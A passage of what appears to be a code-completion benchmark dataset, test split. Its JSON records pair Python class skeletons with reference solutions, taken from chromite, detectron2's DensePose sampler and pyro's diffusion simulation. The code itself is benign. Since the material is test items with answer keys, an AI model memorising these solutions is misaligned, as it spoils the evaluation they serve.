as doing an import would also search those for .py modules.\n\nMethod signatures and docstrings:\n- def find_module(self, fullname, _path=None): Handle the 'chromite' module\n- def load_module(self, _fullname): Return our cache of the 'chromite' module", "prompted_full_text": "Implement the Python class `ChromiteImporter` described below.\n\nClass description:\nVirtual chromite module If the checkout is not named 'chromite', trying to do 'from chromite.xxx' to import modules fails horribly. Instead, manually locate the chromite directory (whatever it is named), load & return it whenever someone tries to import it. This lets us use the stable name 'chromite' regardless of how things are structured on disk. This also lets us keep the sys.path search clean. Otherwise we'd have to worry about what other dirs chromite were checked out near to as doing an import would also search those for .py modules.\n\nMethod signatures and docstrings:\n- def find_module(self, fullname, _path=None): Handle the 'chromite' module\n- def load_module(self, _fullname): Return our cache of the 'chromite' module\n\n<|skeleton|>\nclass ChromiteImporter:\n \"\"\"Virtual chromite module If the checkout is not named 'chromite', trying to do 'from chromite.xxx' to import modules fails horribly. Instead, manually locate the chromite directory (whatever it is named), load & return it whenever someone tries to import it. This lets us use the stable name 'chromite' regardless of how things are structured on disk. This also lets us keep the sys.path search clean. 
Otherwise we'd have to worry about what other dirs chromite were checked out near to as doing an import would also search those for .py modules.\"\"\"\n\n def find_module(self, fullname, _path=None):\n \"\"\"Handle the 'chromite' module\"\"\"\n <|body_0|>\n\n def load_module(self, _fullname):\n \"\"\"Return our cache of the 'chromite' module\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if fullname == 'chromite' and (not self._loading):\n return self\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n path = os.path.dirname(os.path.realpath(__file__))\n while not os.path.exists(os.path.join(path, 'PRESUBMIT.cfg')):\n path = os.path.dirname(path)\n global CHROMITE_PATH\n CHROMITE_PATH = path + '/'\n path, mod = os.path.split(path)\n sys.path.insert(0, path)\n self._loading = True\n try:\n return __import__(mod)\n finally:\n sys.path.remove(path)\n self._loading = False\n<|end_body_1|>\n", "revision_id": "72a05af97787001756bae2511b7985e61498c965", "skeleton": "<|skeleton|>\nclass ChromiteImporter:\n \"\"\"Virtual chromite module If the checkout is not named 'chromite', trying to do 'from chromite.xxx' to import modules fails horribly. Instead, manually locate the chromite directory (whatever it is named), load & return it whenever someone tries to import it. This lets us use the stable name 'chromite' regardless of how things are structured on disk. This also lets us keep the sys.path search clean. Otherwise we'd have to worry about what other dirs chromite were checked out near to as doing an import would also search those for .py modules.\"\"\"\n\n def find_module(self, fullname, _path=None):\n \"\"\"Handle the 'chromite' module\"\"\"\n <|body_0|>\n\n def load_module(self, _fullname):\n \"\"\"Return our cache of the 'chromite' module\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ChromiteImporter:\n \"\"\"Virtual chromite module If the checkout is not named 'chromite', trying to do 'from chromite.xxx' to import modules fails horribly. Instead, manually locate the chromite directory (whatever it is named), load & return it whenever someone tries to import it. This lets us use the stable name 'chromite' regardless of how things are structured on disk. This also lets us keep the sys.path search clean. 
Otherwise we'd have to worry about what other dirs chromite were checked out near to as doing an import would also search those for .py modules.\"\"\"\n\n def find_module(self, fullname, _path=None):\n \"\"\"Handle the 'chromite' module\"\"\"\n if fullname == 'chromite' and (not self._loading):\n return self\n return None\n\n def load_module(self, _fullname):\n \"\"\"Return our cache of the 'chromite' module\"\"\"\n path = os.path.dirname(os.path.realpath(__file__))\n while not os.path.exists(os.path.join(path, 'PRESUBMIT.cfg')):\n path = os.path.dirname(path)\n global CHROMITE_PATH\n CHROMITE_PATH = path + '/'\n path, mod = os.path.split(path)\n sys.path.insert(0, path)\n self._loading = True\n try:\n return __import__(mod)\n finally:\n sys.path.remove(path)\n self._loading = False\n", "source": "the_stack_v2_python_sparse", "source_path": "third_party/chromite/scripts/wrapper.py", "source_repo": "metux/chromium-suckless", "split": "test", "star_events_count": 5} {"blob_id": "39286c7d7d038c205e614719750c8cf1ac45a85d", "bodies": ["super().__init__(count_per_class)\nself.confidence_channel = confidence_channel\nself.search_count_multiplier = search_count_multiplier\nself.search_proportion = search_proportion\nassert search_count_multiplier is None or search_proportion is None, f'Cannot specify both search_count_multiplier (={search_count_multiplier})and search_proportion (={search_proportion})'", "k = values.shape[1]\nif k == count:\n index_sample = list(range(k))\nelse:\n _, sorted_confidence_indices = torch.sort(values[2])\n if self.search_count_multiplier is not None:\n search_count = min(int(count * self.search_count_multiplier), k)\n elif self.search_proportion is not None:\n search_count = min(max(int(k * self.search_proportion), count), k)\n else:\n search_count = min(count, k)\n sample_from_top = random.sample(range(search_count), count)\n index_sample = sorted_confidence_indices[:search_count][sample_from_top]\nreturn index_sample", "converter = ToChartResultConverterWithConfidences\nchart_result = converter.convert(instance.pred_densepose, instance.pred_boxes)\nlabels, dp_result = (chart_result.labels.cpu(), chart_result.uv.cpu())\ndp_result = torch.cat((dp_result, getattr(chart_result, self.confidence_channel)[None].cpu()))\nreturn (labels, dp_result)"], "bodies_text": "<|body_start_0|>\n super().__init__(count_per_class)\n self.confidence_channel = confidence_channel\n self.search_count_multiplier = search_count_multiplier\n self.search_proportion = search_proportion\n assert search_count_multiplier is None or search_proportion is None, f'Cannot specify both search_count_multiplier (={search_count_multiplier})and search_proportion (={search_proportion})'\n<|end_body_0|>\n\n<|body_start_1|>\n k = values.shape[1]\n if k == count:\n index_sample = list(range(k))\n else:\n _, sorted_confidence_indices = torch.sort(values[2])\n if self.search_count_multiplier is not None:\n search_count = min(int(count * self.search_count_multiplier), k)\n elif self.search_proportion is not None:\n search_count = min(max(int(k * self.search_proportion), count), k)\n else:\n search_count = min(count, k)\n sample_from_top = random.sample(range(search_count), count)\n index_sample = sorted_confidence_indices[:search_count][sample_from_top]\n return index_sample\n<|end_body_1|>\n\n<|body_start_2|>\n converter = ToChartResultConverterWithConfidences\n chart_result = converter.convert(instance.pred_densepose, instance.pred_boxes)\n labels, dp_result = (chart_result.labels.cpu(), chart_result.uv.cpu())\n 
dp_result = torch.cat((dp_result, getattr(chart_result, self.confidence_channel)[None].cpu()))\n return (labels, dp_result)\n<|end_body_2|>\n", "class_docstring": "Samples DensePose data from DensePose predictions. Samples for each class are drawn using confidence value estimates.", "class_name": "DensePoseConfidenceBasedSampler", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DensePoseConfidenceBasedSampler:\n \"\"\"Samples DensePose data from DensePose predictions. Samples for each class are drawn using confidence value estimates.\"\"\"\n\n def __init__(self, confidence_channel: str, count_per_class: int=8, search_count_multiplier: Optional[float]=None, search_proportion: Optional[float]=None):\n \"\"\"Constructor Args: confidence_channel (str): confidence channel to use for sampling; possible values: \"sigma_2\": confidences for UV values \"fine_segm_confidence\": confidences for fine segmentation \"coarse_segm_confidence\": confidences for coarse segmentation (default: \"sigma_2\") count_per_class (int): the sampler produces at most `count_per_class` samples for each category (default: 8) search_count_multiplier (float or None): if not None, the total number of the most confident estimates of a given class to consider is defined as `min(search_count_multiplier * count_per_class, N)`, where `N` is the total number of estimates of the class; cannot be specified together with `search_proportion` (d\"\"\"\n <|body_0|>\n\n def _produce_index_sample(self, values: torch.Tensor, count: int):\n \"\"\"Produce a sample of indices to select data based on confidences Args: values (torch.Tensor): an array of size [n, k] that contains estimated values (U, V, confidences); n: number of channels (U, V, confidences) k: number of points labeled with part_id count (int): number of samples to produce, should be positive and <= k Return: list(int): indices of values (along axis 1) selected as a sample\"\"\"\n <|body_1|>\n\n def _produce_labels_and_results(self, instance) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Method to get labels and DensePose results from an instance, with confidences Args: instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences` Return: labels (torch.Tensor): shape [H, W], DensePose segmentation labels dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v stacked with the confidence channel\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(count_per_class)\n self.confidence_channel = confidence_channel\n self.search_count_multiplier = search_count_multiplier\n self.search_proportion = search_proportion\n assert search_count_multiplier is None or search_proportion is None, f'Cannot specify both search_count_multiplier (={search_count_multiplier})and search_proportion (={search_proportion})'\n<|end_body_0|>\n\n<|body_start_1|>\n k = values.shape[1]\n if k == count:\n index_sample = list(range(k))\n else:\n _, sorted_confidence_indices = torch.sort(values[2])\n if self.search_count_multiplier is not None:\n search_count = min(int(count * self.search_count_multiplier), k)\n elif self.search_proportion is not None:\n search_count = min(max(int(k * self.search_proportion), count), k)\n else:\n search_count = min(count, k)\n sample_from_top = random.sample(range(search_count), count)\n index_sample = sorted_confidence_indices[:search_count][sample_from_top]\n return index_sample\n<|end_body_1|>\n\n<|body_start_2|>\n converter = 
ToChartResultConverterWithConfidences\n chart_result = converter.convert(instance.pred_densepose, instance.pred_boxes)\n labels, dp_result = (chart_result.labels.cpu(), chart_result.uv.cpu())\n dp_result = torch.cat((dp_result, getattr(chart_result, self.confidence_channel)[None].cpu()))\n return (labels, dp_result)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000176", "length_bytes": 4801, "license_type": "permissive", "methods": [{"docstring": "Constructor Args: confidence_channel (str): confidence channel to use for sampling; possible values: \"sigma_2\": confidences for UV values \"fine_segm_confidence\": confidences for fine segmentation \"coarse_segm_confidence\": confidences for coarse segmentation (default: \"sigma_2\") count_per_class (int): the sampler produces at most `count_per_class` samples for each category (default: 8) search_count_multiplier (float or None): if not None, the total number of the most confident estimates of a given class to consider is defined as `min(search_count_multiplier * count_per_class, N)`, where `N` is the total number of estimates of the class; cannot be specified together with `search_proportion` (d", "name": "__init__", "signature": "def __init__(self, confidence_channel: str, count_per_class: int=8, search_count_multiplier: Optional[float]=None, search_proportion: Optional[float]=None)"}, {"docstring": "Produce a sample of indices to select data based on confidences Args: values (torch.Tensor): an array of size [n, k] that contains estimated values (U, V, confidences); n: number of channels (U, V, confidences) k: number of points labeled with part_id count (int): number of samples to produce, should be positive and <= k Return: list(int): indices of values (along axis 1) selected as a sample", "name": "_produce_index_sample", "signature": "def _produce_index_sample(self, values: torch.Tensor, count: int)"}, {"docstring": "Method to get labels and DensePose results from an instance, with confidences Args: instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences` Return: labels (torch.Tensor): shape [H, W], DensePose segmentation labels dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v stacked with the confidence channel", "name": "_produce_labels_and_results", "signature": "def _produce_labels_and_results(self, instance) -> Tuple[torch.Tensor, torch.Tensor]"}], "n_methods": 3, "prompt": "Implement the Python class `DensePoseConfidenceBasedSampler` described below.\n\nClass description:\nSamples DensePose data from DensePose predictions. 
Samples for each class are drawn using confidence value estimates.\n\nMethod signatures and docstrings:\n- def __init__(self, confidence_channel: str, count_per_class: int=8, search_count_multiplier: Optional[float]=None, search_proportion: Optional[float]=None): Constructor Args: confidence_channel (str): confidence channel to use for sampling; possible values: \"sigma_2\": confidences for UV values \"fine_segm_confidence\": confidences for fine segmentation \"coarse_segm_confidence\": confidences for coarse segmentation (default: \"sigma_2\") count_per_class (int): the sampler produces at most `count_per_class` samples for each category (default: 8) search_count_multiplier (float or None): if not None, the total number of the most confident estimates of a given class to consider is defined as `min(search_count_multiplier * count_per_class, N)`, where `N` is the total number of estimates of the class; cannot be specified together with `search_proportion` (d\n- def _produce_index_sample(self, values: torch.Tensor, count: int): Produce a sample of indices to select data based on confidences Args: values (torch.Tensor): an array of size [n, k] that contains estimated values (U, V, confidences); n: number of channels (U, V, confidences) k: number of points labeled with part_id count (int): number of samples to produce, should be positive and <= k Return: list(int): indices of values (along axis 1) selected as a sample\n- def _produce_labels_and_results(self, instance) -> Tuple[torch.Tensor, torch.Tensor]: Method to get labels and DensePose results from an instance, with confidences Args: instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences` Return: labels (torch.Tensor): shape [H, W], DensePose segmentation labels dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v stacked with the confidence channel", "prompted_full_text": "Implement the Python class `DensePoseConfidenceBasedSampler` described below.\n\nClass description:\nSamples DensePose data from DensePose predictions. 
Samples for each class are drawn using confidence value estimates.\n\nMethod signatures and docstrings:\n- def __init__(self, confidence_channel: str, count_per_class: int=8, search_count_multiplier: Optional[float]=None, search_proportion: Optional[float]=None): Constructor Args: confidence_channel (str): confidence channel to use for sampling; possible values: \"sigma_2\": confidences for UV values \"fine_segm_confidence\": confidences for fine segmentation \"coarse_segm_confidence\": confidences for coarse segmentation (default: \"sigma_2\") count_per_class (int): the sampler produces at most `count_per_class` samples for each category (default: 8) search_count_multiplier (float or None): if not None, the total number of the most confident estimates of a given class to consider is defined as `min(search_count_multiplier * count_per_class, N)`, where `N` is the total number of estimates of the class; cannot be specified together with `search_proportion` (d\n- def _produce_index_sample(self, values: torch.Tensor, count: int): Produce a sample of indices to select data based on confidences Args: values (torch.Tensor): an array of size [n, k] that contains estimated values (U, V, confidences); n: number of channels (U, V, confidences) k: number of points labeled with part_id count (int): number of samples to produce, should be positive and <= k Return: list(int): indices of values (along axis 1) selected as a sample\n- def _produce_labels_and_results(self, instance) -> Tuple[torch.Tensor, torch.Tensor]: Method to get labels and DensePose results from an instance, with confidences Args: instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences` Return: labels (torch.Tensor): shape [H, W], DensePose segmentation labels dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v stacked with the confidence channel\n\n<|skeleton|>\nclass DensePoseConfidenceBasedSampler:\n \"\"\"Samples DensePose data from DensePose predictions. 
Samples for each class are drawn using confidence value estimates.\"\"\"\n\n def __init__(self, confidence_channel: str, count_per_class: int=8, search_count_multiplier: Optional[float]=None, search_proportion: Optional[float]=None):\n \"\"\"Constructor Args: confidence_channel (str): confidence channel to use for sampling; possible values: \"sigma_2\": confidences for UV values \"fine_segm_confidence\": confidences for fine segmentation \"coarse_segm_confidence\": confidences for coarse segmentation (default: \"sigma_2\") count_per_class (int): the sampler produces at most `count_per_class` samples for each category (default: 8) search_count_multiplier (float or None): if not None, the total number of the most confident estimates of a given class to consider is defined as `min(search_count_multiplier * count_per_class, N)`, where `N` is the total number of estimates of the class; cannot be specified together with `search_proportion` (d\"\"\"\n <|body_0|>\n\n def _produce_index_sample(self, values: torch.Tensor, count: int):\n \"\"\"Produce a sample of indices to select data based on confidences Args: values (torch.Tensor): an array of size [n, k] that contains estimated values (U, V, confidences); n: number of channels (U, V, confidences) k: number of points labeled with part_id count (int): number of samples to produce, should be positive and <= k Return: list(int): indices of values (along axis 1) selected as a sample\"\"\"\n <|body_1|>\n\n def _produce_labels_and_results(self, instance) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Method to get labels and DensePose results from an instance, with confidences Args: instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences` Return: labels (torch.Tensor): shape [H, W], DensePose segmentation labels dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v stacked with the confidence channel\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(count_per_class)\n self.confidence_channel = confidence_channel\n self.search_count_multiplier = search_count_multiplier\n self.search_proportion = search_proportion\n assert search_count_multiplier is None or search_proportion is None, f'Cannot specify both search_count_multiplier (={search_count_multiplier})and search_proportion (={search_proportion})'\n<|end_body_0|>\n\n<|body_start_1|>\n k = values.shape[1]\n if k == count:\n index_sample = list(range(k))\n else:\n _, sorted_confidence_indices = torch.sort(values[2])\n if self.search_count_multiplier is not None:\n search_count = min(int(count * self.search_count_multiplier), k)\n elif self.search_proportion is not None:\n search_count = min(max(int(k * self.search_proportion), count), k)\n else:\n search_count = min(count, k)\n sample_from_top = random.sample(range(search_count), count)\n index_sample = sorted_confidence_indices[:search_count][sample_from_top]\n return index_sample\n<|end_body_1|>\n\n<|body_start_2|>\n converter = ToChartResultConverterWithConfidences\n chart_result = converter.convert(instance.pred_densepose, instance.pred_boxes)\n labels, dp_result = (chart_result.labels.cpu(), chart_result.uv.cpu())\n dp_result = torch.cat((dp_result, getattr(chart_result, self.confidence_channel)[None].cpu()))\n return (labels, dp_result)\n<|end_body_2|>\n", "revision_id": "80307d2d5e06f06a8a677cc2653f23a4c56402ac", "skeleton": "<|skeleton|>\nclass DensePoseConfidenceBasedSampler:\n \"\"\"Samples DensePose data from DensePose predictions. 
Samples for each class are drawn using confidence value estimates.\"\"\"\n\n def __init__(self, confidence_channel: str, count_per_class: int=8, search_count_multiplier: Optional[float]=None, search_proportion: Optional[float]=None):\n \"\"\"Constructor Args: confidence_channel (str): confidence channel to use for sampling; possible values: \"sigma_2\": confidences for UV values \"fine_segm_confidence\": confidences for fine segmentation \"coarse_segm_confidence\": confidences for coarse segmentation (default: \"sigma_2\") count_per_class (int): the sampler produces at most `count_per_class` samples for each category (default: 8) search_count_multiplier (float or None): if not None, the total number of the most confident estimates of a given class to consider is defined as `min(search_count_multiplier * count_per_class, N)`, where `N` is the total number of estimates of the class; cannot be specified together with `search_proportion` (d\"\"\"\n <|body_0|>\n\n def _produce_index_sample(self, values: torch.Tensor, count: int):\n \"\"\"Produce a sample of indices to select data based on confidences Args: values (torch.Tensor): an array of size [n, k] that contains estimated values (U, V, confidences); n: number of channels (U, V, confidences) k: number of points labeled with part_id count (int): number of samples to produce, should be positive and <= k Return: list(int): indices of values (along axis 1) selected as a sample\"\"\"\n <|body_1|>\n\n def _produce_labels_and_results(self, instance) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Method to get labels and DensePose results from an instance, with confidences Args: instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences` Return: labels (torch.Tensor): shape [H, W], DensePose segmentation labels dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v stacked with the confidence channel\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DensePoseConfidenceBasedSampler:\n \"\"\"Samples DensePose data from DensePose predictions. 
Samples for each class are drawn using confidence value estimates.\"\"\"\n\n def __init__(self, confidence_channel: str, count_per_class: int=8, search_count_multiplier: Optional[float]=None, search_proportion: Optional[float]=None):\n \"\"\"Constructor Args: confidence_channel (str): confidence channel to use for sampling; possible values: \"sigma_2\": confidences for UV values \"fine_segm_confidence\": confidences for fine segmentation \"coarse_segm_confidence\": confidences for coarse segmentation (default: \"sigma_2\") count_per_class (int): the sampler produces at most `count_per_class` samples for each category (default: 8) search_count_multiplier (float or None): if not None, the total number of the most confident estimates of a given class to consider is defined as `min(search_count_multiplier * count_per_class, N)`, where `N` is the total number of estimates of the class; cannot be specified together with `search_proportion` (d\"\"\"\n super().__init__(count_per_class)\n self.confidence_channel = confidence_channel\n self.search_count_multiplier = search_count_multiplier\n self.search_proportion = search_proportion\n assert search_count_multiplier is None or search_proportion is None, f'Cannot specify both search_count_multiplier (={search_count_multiplier})and search_proportion (={search_proportion})'\n\n def _produce_index_sample(self, values: torch.Tensor, count: int):\n \"\"\"Produce a sample of indices to select data based on confidences Args: values (torch.Tensor): an array of size [n, k] that contains estimated values (U, V, confidences); n: number of channels (U, V, confidences) k: number of points labeled with part_id count (int): number of samples to produce, should be positive and <= k Return: list(int): indices of values (along axis 1) selected as a sample\"\"\"\n k = values.shape[1]\n if k == count:\n index_sample = list(range(k))\n else:\n _, sorted_confidence_indices = torch.sort(values[2])\n if self.search_count_multiplier is not None:\n search_count = min(int(count * self.search_count_multiplier), k)\n elif self.search_proportion is not None:\n search_count = min(max(int(k * self.search_proportion), count), k)\n else:\n search_count = min(count, k)\n sample_from_top = random.sample(range(search_count), count)\n index_sample = sorted_confidence_indices[:search_count][sample_from_top]\n return index_sample\n\n def _produce_labels_and_results(self, instance) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Method to get labels and DensePose results from an instance, with confidences Args: instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences` Return: labels (torch.Tensor): shape [H, W], DensePose segmentation labels dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v stacked with the confidence channel\"\"\"\n converter = ToChartResultConverterWithConfidences\n chart_result = converter.convert(instance.pred_densepose, instance.pred_boxes)\n labels, dp_result = (chart_result.labels.cpu(), chart_result.uv.cpu())\n dp_result = torch.cat((dp_result, getattr(chart_result, self.confidence_channel)[None].cpu()))\n return (labels, dp_result)\n", "source": "the_stack_v2_python_sparse", "source_path": "projects/DensePose/densepose/data/samplers/densepose_confidence_based.py", "source_repo": "facebookresearch/detectron2", "split": "test", "star_events_count": 27469} {"blob_id": "4758b46fc3d7eba6bce47d6e671bf1940552519a", "bodies": ["my_grid = grid_setup(self.rp, ng=1)\nif my_grid.nx != my_grid.ny:\n msg.fail('need nx = ny for diffusion 
problems')\nn = int(math.log(my_grid.nx) / math.log(2.0))\nif 2 ** n != my_grid.nx:\n msg.fail('grid needs to be a power of 2')\nbc, _, _ = bc_setup(self.rp)\nfor bnd in [bc.xlb, bc.xrb, bc.ylb, bc.yrb]:\n if bnd not in ['periodic', 'neumann', 'dirichlet']:\n msg.fail('invalid BC')\nmy_data = patch.CellCenterData2d(my_grid)\nmy_data.register_var('phi', bc)\nmy_data.create()\nself.cc_data = my_data\nproblem = importlib.import_module(f'pyro.diffusion.problems.{self.problem_name}')\nproblem.init_data(self.cc_data, self.rp)", "cfl = self.rp.get_param('driver.cfl')\nk = self.rp.get_param('diffusion.k')\nxtmp = self.cc_data.grid.dx ** 2 / k\nytmp = self.cc_data.grid.dy ** 2 / k\nself.dt = cfl * min(xtmp, ytmp)", "self.cc_data.fill_BC_all()\nphi = self.cc_data.get_var('phi')\nmyg = self.cc_data.grid\nk = self.rp.get_param('diffusion.k')\nmg = MG.CellCenterMG2d(myg.nx, myg.ny, xmin=myg.xmin, xmax=myg.xmax, ymin=myg.ymin, ymax=myg.ymax, xl_BC_type=self.cc_data.BCs['phi'].xlb, xr_BC_type=self.cc_data.BCs['phi'].xrb, yl_BC_type=self.cc_data.BCs['phi'].ylb, yr_BC_type=self.cc_data.BCs['phi'].yrb, alpha=1.0, beta=0.5 * self.dt * k, verbose=0)\nf = mg.soln_grid.scratch_array()\nf.v()[:, :] = phi.v() + 0.5 * self.dt * k * ((phi.ip(1) + phi.ip(-1) - 2.0 * phi.v()) / myg.dx ** 2 + (phi.jp(1) + phi.jp(-1) - 2.0 * phi.v()) / myg.dy ** 2)\nmg.init_RHS(f)\nmg.init_zeros()\nmg.solve(rtol=1e-10)\nphi.v()[:, :] = mg.get_solution().v()\nself.cc_data.t += self.dt\nself.n += 1", "plt.clf()\nphi = self.cc_data.get_var('phi')\nmyg = self.cc_data.grid\nimg = plt.imshow(np.transpose(phi.v()), interpolation='nearest', origin='lower', extent=[myg.xmin, myg.xmax, myg.ymin, myg.ymax], cmap=self.cm)\nplt.xlabel('x')\nplt.ylabel('y')\nplt.title('phi')\ncb = plt.colorbar(img)\ncb.formatter = matplotlib.ticker.FormatStrFormatter('')\nplt.figtext(0.05, 0.0125, f't = {self.cc_data.t:10.5f}')\nplt.pause(0.001)\nplt.draw()"], "bodies_text": "<|body_start_0|>\n my_grid = grid_setup(self.rp, ng=1)\n if my_grid.nx != my_grid.ny:\n msg.fail('need nx = ny for diffusion problems')\n n = int(math.log(my_grid.nx) / math.log(2.0))\n if 2 ** n != my_grid.nx:\n msg.fail('grid needs to be a power of 2')\n bc, _, _ = bc_setup(self.rp)\n for bnd in [bc.xlb, bc.xrb, bc.ylb, bc.yrb]:\n if bnd not in ['periodic', 'neumann', 'dirichlet']:\n msg.fail('invalid BC')\n my_data = patch.CellCenterData2d(my_grid)\n my_data.register_var('phi', bc)\n my_data.create()\n self.cc_data = my_data\n problem = importlib.import_module(f'pyro.diffusion.problems.{self.problem_name}')\n problem.init_data(self.cc_data, self.rp)\n<|end_body_0|>\n\n<|body_start_1|>\n cfl = self.rp.get_param('driver.cfl')\n k = self.rp.get_param('diffusion.k')\n xtmp = self.cc_data.grid.dx ** 2 / k\n ytmp = self.cc_data.grid.dy ** 2 / k\n self.dt = cfl * min(xtmp, ytmp)\n<|end_body_1|>\n\n<|body_start_2|>\n self.cc_data.fill_BC_all()\n phi = self.cc_data.get_var('phi')\n myg = self.cc_data.grid\n k = self.rp.get_param('diffusion.k')\n mg = MG.CellCenterMG2d(myg.nx, myg.ny, xmin=myg.xmin, xmax=myg.xmax, ymin=myg.ymin, ymax=myg.ymax, xl_BC_type=self.cc_data.BCs['phi'].xlb, xr_BC_type=self.cc_data.BCs['phi'].xrb, yl_BC_type=self.cc_data.BCs['phi'].ylb, yr_BC_type=self.cc_data.BCs['phi'].yrb, alpha=1.0, beta=0.5 * self.dt * k, verbose=0)\n f = mg.soln_grid.scratch_array()\n f.v()[:, :] = phi.v() + 0.5 * self.dt * k * ((phi.ip(1) + phi.ip(-1) - 2.0 * phi.v()) / myg.dx ** 2 + (phi.jp(1) + phi.jp(-1) - 2.0 * phi.v()) / myg.dy ** 2)\n mg.init_RHS(f)\n mg.init_zeros()\n mg.solve(rtol=1e-10)\n 
phi.v()[:, :] = mg.get_solution().v()\n self.cc_data.t += self.dt\n self.n += 1\n<|end_body_2|>\n\n<|body_start_3|>\n plt.clf()\n phi = self.cc_data.get_var('phi')\n myg = self.cc_data.grid\n img = plt.imshow(np.transpose(phi.v()), interpolation='nearest', origin='lower', extent=[myg.xmin, myg.xmax, myg.ymin, myg.ymax], cmap=self.cm)\n plt.xlabel('x')\n plt.ylabel('y')\n plt.title('phi')\n cb = plt.colorbar(img)\n cb.formatter = matplotlib.ticker.FormatStrFormatter('')\n plt.figtext(0.05, 0.0125, f't = {self.cc_data.t:10.5f}')\n plt.pause(0.001)\n plt.draw()\n<|end_body_3|>\n", "class_docstring": "A simulation of diffusion", "class_name": "Simulation", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Simulation:\n \"\"\"A simulation of diffusion\"\"\"\n\n def initialize(self):\n \"\"\"Initialize the grid and variables for diffusion and set the initial conditions for the chosen problem.\"\"\"\n <|body_0|>\n\n def method_compute_timestep(self):\n \"\"\"The diffusion timestep() function computes the timestep using the explicit timestep constraint as the starting point. We then multiply by the CFL number to get the timestep. Since we are doing an implicit discretization, we do not require CFL < 1.\"\"\"\n <|body_1|>\n\n def evolve(self):\n \"\"\"Diffusion through dt using C-N implicit solve with multigrid\"\"\"\n <|body_2|>\n\n def dovis(self):\n \"\"\"Do runtime visualization.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n my_grid = grid_setup(self.rp, ng=1)\n if my_grid.nx != my_grid.ny:\n msg.fail('need nx = ny for diffusion problems')\n n = int(math.log(my_grid.nx) / math.log(2.0))\n if 2 ** n != my_grid.nx:\n msg.fail('grid needs to be a power of 2')\n bc, _, _ = bc_setup(self.rp)\n for bnd in [bc.xlb, bc.xrb, bc.ylb, bc.yrb]:\n if bnd not in ['periodic', 'neumann', 'dirichlet']:\n msg.fail('invalid BC')\n my_data = patch.CellCenterData2d(my_grid)\n my_data.register_var('phi', bc)\n my_data.create()\n self.cc_data = my_data\n problem = importlib.import_module(f'pyro.diffusion.problems.{self.problem_name}')\n problem.init_data(self.cc_data, self.rp)\n<|end_body_0|>\n\n<|body_start_1|>\n cfl = self.rp.get_param('driver.cfl')\n k = self.rp.get_param('diffusion.k')\n xtmp = self.cc_data.grid.dx ** 2 / k\n ytmp = self.cc_data.grid.dy ** 2 / k\n self.dt = cfl * min(xtmp, ytmp)\n<|end_body_1|>\n\n<|body_start_2|>\n self.cc_data.fill_BC_all()\n phi = self.cc_data.get_var('phi')\n myg = self.cc_data.grid\n k = self.rp.get_param('diffusion.k')\n mg = MG.CellCenterMG2d(myg.nx, myg.ny, xmin=myg.xmin, xmax=myg.xmax, ymin=myg.ymin, ymax=myg.ymax, xl_BC_type=self.cc_data.BCs['phi'].xlb, xr_BC_type=self.cc_data.BCs['phi'].xrb, yl_BC_type=self.cc_data.BCs['phi'].ylb, yr_BC_type=self.cc_data.BCs['phi'].yrb, alpha=1.0, beta=0.5 * self.dt * k, verbose=0)\n f = mg.soln_grid.scratch_array()\n f.v()[:, :] = phi.v() + 0.5 * self.dt * k * ((phi.ip(1) + phi.ip(-1) - 2.0 * phi.v()) / myg.dx ** 2 + (phi.jp(1) + phi.jp(-1) - 2.0 * phi.v()) / myg.dy ** 2)\n mg.init_RHS(f)\n mg.init_zeros()\n mg.solve(rtol=1e-10)\n phi.v()[:, :] = mg.get_solution().v()\n self.cc_data.t += self.dt\n self.n += 1\n<|end_body_2|>\n\n<|body_start_3|>\n plt.clf()\n phi = self.cc_data.get_var('phi')\n myg = self.cc_data.grid\n img = plt.imshow(np.transpose(phi.v()), interpolation='nearest', origin='lower', extent=[myg.xmin, myg.xmax, myg.ymin, myg.ymax], cmap=self.cm)\n plt.xlabel('x')\n plt.ylabel('y')\n plt.title('phi')\n cb = plt.colorbar(img)\n 
